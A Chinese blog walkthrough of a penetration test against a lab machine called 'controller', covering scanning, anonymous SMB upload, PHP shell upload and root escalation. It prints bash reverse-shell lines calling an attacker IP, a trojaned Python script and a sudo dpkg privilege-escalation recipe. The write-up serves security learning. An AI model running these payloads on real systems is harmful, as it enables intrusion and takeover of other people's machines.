靶机渗透日记 controller

已于 2022-03-02 15:07:23 修改
阅读量1.8k 收藏
点赞数
文章标签: 安全 web安全 渗透测试
于 2022-02-25 12:13:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123130206
版权

  1. IP

  2. 端口

    在这里插入图片描述

  3. 目录扫描

    在这里插入图片描述

    发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来

  4. 访问80端口

    在这里插入图片描述

    文档说明我们可以上传一个项目,并可以被运行

  5. 服务器还开放了 139,445 端口,访问 SMB 服务

    在这里插入图片描述

    可以匿名访问

  6. 上传 shell.txt

    import commands
commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1"')

  7. 监听本地4444端口成功反弹shell

    在这里插入图片描述

  8. 发现用户 webserv 在本地8080端口运行了一个网站

    在这里插入图片描述

  9. 使用 frp 将目标端口 8080 代理到本地的 6000 端口

  10. 目录扫描

    在这里插入图片描述

    发现存在 upload.php

  11. 发现可以直接上传 .php 文件,成功getshell后发现无法执行命令

    在这里插入图片描述

    使用 PHP7_UserFilter 进行绕过

    在这里插入图片描述

  12. 检查用户拥有的文件

    find / -user webservice 2>/dev/null

    在这里插入图片描述

    查看 website.py 文件

    import socket
import sys
import os

scan = '127.0.0.1'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
check = s.connect_ex((scan,port))
if check == 0:
	os.system("echo 'website up'>> /opt/logs/log.txt")
else:
	os.system("echo 'website down'>> /opt/logs/log.txt")
s.close
sys.exit(0)

    替换payload

    import socket
import sys
import os

os.system('/bin/bash -c "bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"')

    监听5555端口反弹shell

    在这里插入图片描述

  13. 执行sudo -l

    在这里插入图片描述

    利用 dpkg 提权

    TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

    sudo dpkg -i x_1.0_all.deb

    在这里插入图片描述

# .
关注
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2263
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
spring security中security="none"与ROLE_ANONYMOUS区别
weixin_33898876的博客
06-10 2016
为什么80%的码农都做不了架构师?>>> ...
靶机渗透日记
Anonymous
03-01 3548
IP 端口 访问 80 端口 目录扫描 robots.txt & note.txt 访问 crossroads.png ,是一张图片 访问 SMB smbclient -L 192.168.0.133 访问 smbshare 提示需要密码 对目标上的SMB信息进行枚举 enum4linux 192.168.0.133 -A 爆破 SMB 密码 登录 SMB 服务 smbclient //192.168.0.133/smbshare -U ..
靶机渗透日记 funbox
Anonymous
02-22 929
ip 端口 访问 80 端口 目录扫描 访问 robots.txt , /secret ,/admin/?/login 发现都没有得到有用的东西,继续对 /store 目录扫描 同样存在后台地址 访问该后台地址 这里通过尝试弱口令或者在 books 标签页中发现参数 bookisbn 存在sql注入,通过 sqlmap 也可以得到后台管理员的账号密码 发现存在文件上传,尝试上传webshell 在Image可以直接上传.php可以成功getshell 在 /home/to.
靶机渗透日记-内网
Anonymous
03-22 3627
WEB win7/admin 域成员 win2016/Admin#123 域控 administrator/Admin@666 流程 IP探测 端口扫描 Win7系统,并且开放了139,445端口,尝试MS17-010 返回 system 权限 还有一种思路就是利用80端口的通达OA系统 使用工具上传一句话木马,使用蚁剑连接GETSHELL 信息收集,发现WEB服务器存在双网卡 添加路由信息 run post/multi/manage/autoro..
JIS-CTF 靶机渗透
qq_43235703的博客
02-02 2293
渗透之JIS-CTF靶机 攻击环境 攻击机:kali(10.0.10.223) 靶机:在vmbox上(10.0.10.221) 连接设置:两台均为桥接网卡 探嗅目标 netdiscover -i eth0 _____________________________________________________________________________ IPAt MAC Address...
靶机渗透【bulldog】
学信安技术 卫国家之门
11-04 4585
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
DC-4靶机渗透
weixin_45349299的博客
12-21 1074
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1858
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
网安新声 | 黎巴嫩BP机爆炸事件带来的安全新挑战与反思
WAJXY2021的博客
09-23 360
黎巴嫩传呼设备爆炸事件迅速在全球范围内掀起广泛讨论,它不仅引发了全球对智能设备安全性的忧虑,更是敲响了警钟:网络世界与物理现实的界限已打破,针对网络空间的攻击能够直接穿透至现实世界,造成实质性的破坏与伤害,为全球安全格局带来了新的挑战与反思。
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 897
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
2024年信息安全企业CRM选型与应用研究报告
weixin_51170096的博客
09-23 954
数字化的生活给人们带来便利的同时也带来一定的信息安全隐患,如网络侵权、泄露用户隐私、黑客攻击等。在互联网高度发展的今天,信息安全与我们每个人、每个组织甚至每个国家都息息相关。信息安全行业蓬勃发展。根据智研咨询数据,2021年,我国信息安全市场规模增长至1825亿元,同比增长21.83%。预计2023年市场规模将达到2294亿元。对信息安全企业而言,在高速增长而又竞争激烈的市场中,
【中关村在线-注册/登录安全分析报告】
最新发布
09-23 910
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
数据恢复研究℃
09-20 1141
通过综合采取以上预防措施,可以显著降低感染 .[RestoreBackup@cock.li].SRC 、[chewbacca@cock.li].SRC勒索病毒的风险。保持警惕、定期备份数据以及更新安全防护措施是确保数据安全的重要策略。预防永远胜于治疗,积极的安全态度是抵御网络攻击的最佳保障。以下是2024常见传播的勒索病毒,表明勒索病毒正在呈现多样化以及变种迅速地态势发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值